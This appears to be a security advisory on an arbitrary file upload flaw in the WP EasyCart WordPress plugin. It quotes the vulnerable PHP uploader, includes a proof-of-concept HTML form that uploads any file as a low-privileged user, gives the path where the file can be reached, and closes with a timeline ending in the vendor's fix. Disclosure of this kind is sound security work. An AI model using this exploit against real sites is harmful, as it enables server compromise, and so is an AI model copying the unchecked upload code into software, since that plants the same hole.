Any registered user can upload a file of any type. The only gate is `$users || is_user_logged_in()`, so every authenticated WordPress account passes, including a subscriber-level one created through open registration. Neither the extension nor the MIME type is checked, and the file is written to the web-accessible directory wp-content/plugins/wp-easycart/products/banners/.
File: wp-easycart\inc\amfphp\administration\banneruploaderscript.php
$date = $_POST['datemd5'];   // client-controlled, used verbatim in the stored filename
// $requestID is assigned earlier in the script (not shown in this excerpt)
$usersqlquery = sprintf("SELECT ec_user.*, ec_role.admin_access FROM ec_user LEFT JOIN ec_role ON (ec_user.user_level = ec_role.role_label) WHERE ec_user.password = '%s' AND (ec_user.user_level = 'admin' OR ec_role.admin_access = 1)", mysql_real_escape_string($requestID));
$userresult = mysql_query($usersqlquery);
$users = mysql_fetch_assoc($userresult);
// A matching EasyCart admin row OR any logged-in WordPress user passes this check
if ($users || is_user_logged_in()) {
    $filename = $_FILES['Filedata']['name'];
    $filetmpname = $_FILES['Filedata']['tmp_name'];
    $fileType = $_FILES["Filedata"]["type"];                    // read but never validated
    $fileSizeMB = ($_FILES["Filedata"]["size"] / 1024 / 1000);   // read but never validated
    $explodedfilename = pathinfo($filename);
    $nameoffile = $explodedfilename['filename'];
    $fileextension = $explodedfilename['extension'];            // taken from the client-supplied name, no allowlist
    // Stored under the plugin's web-accessible products/banners/ directory with the original extension
    move_uploaded_file($_FILES['Filedata']['tmp_name'], "../../../products/banners/".$nameoffile."_".$date.".".$fileextension);
}
Proof of Concept
Log in as a regular user (an account created through wp-login.php?action=register is enough), then submit the following form:
<form action="http://wordpress-install/wp-content/plugins/wp-easycart/inc/amfphp/administration/banneruploaderscript.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="datemd5" value="1">
<input type="file" name="Filedata">
<input value="Upload!" type="submit">
</form>
The uploaded file is then reachable at:
http://wordpress-install/wp-content/plugins/wp-easycart/products/banners/%filename%_1.%fileextension%
Timeline
- 29-10-2014: Discovered
- 16-11-2014: Vendor notified
- 17-11-2014: Version 3.0.9 released, issue resolved